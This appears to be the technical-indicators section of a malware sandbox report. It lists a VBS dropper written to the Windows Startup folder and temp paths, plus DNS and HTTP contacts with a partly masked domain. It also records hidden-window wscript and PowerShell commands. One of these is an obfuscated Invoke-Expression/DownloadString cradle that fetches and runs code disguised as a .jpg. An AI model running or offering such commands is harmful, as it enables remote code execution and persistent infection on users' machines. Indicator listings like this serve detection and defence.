Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\90ad.vbs
- %TEMP%\90ab.tmp\90ac.tmp\90ad.vbs
- %TEMP%\90ab.tmp\90ac.tmp\90ad.vbs
- '4u##.com':80
- '4u##.com':443
- http://www.4u##.com/uploads/file_2020-04-13_185006.jpg
- '4u##.com':443
- DNS ASK 4u##.com
- '<SYSTEM32>\wscript.exe' %TEMP%\90AB.tmp\90AC.tmp\90AD.vbs //Nologo
- '<SYSTEM32>\wscript.exe' %TEMP%\90AB.tmp\90AC.tmp\90AD.vbs //Nologo' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -command Invoke-Expression(New-Object Net.WebClient).(-join [char[]](68,111,119,110,108,111,97,100,83,116,114,105,110,103)).Invoke('http://www.4u##.com/uploads/file_2020-04-13_185006....' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -command Invoke-Expression(New-Object Net.WebClient).(-join [char[]](68,111,119,110,108,111,97,100,83,116,114,105,110,103)).Invoke('http://www.4u##.com/uploads/file_2020-04-13_185006....